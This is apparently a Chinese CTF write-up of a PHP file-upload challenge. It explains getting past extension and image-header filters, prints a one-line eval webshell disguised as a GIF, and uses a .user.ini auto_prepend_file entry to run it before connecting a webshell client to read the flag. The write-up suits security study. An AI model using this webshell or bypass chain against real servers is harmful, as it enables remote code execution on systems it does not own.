本文介绍: 上传.user.ini使用auto_pr可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行epend_file=将指定文件包含到当前目录下的php文件前

 黑名单过滤后缀’ph’,并且白名单image类型要有对应文件头

对<?过滤,改用GIF89a<script language=’php’>@eval($_POST[‘cmd’]);</script>,成功把getshell.gif上传上去了

尝试用.htaccess将上传的gif当作php解析,但是失败了

根据这篇文章.user.ini文件构成的PHP后门 – phith0n (wooyun.js.org)

上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前

 

 

可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行

 

连接蚁剑找到flag 

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注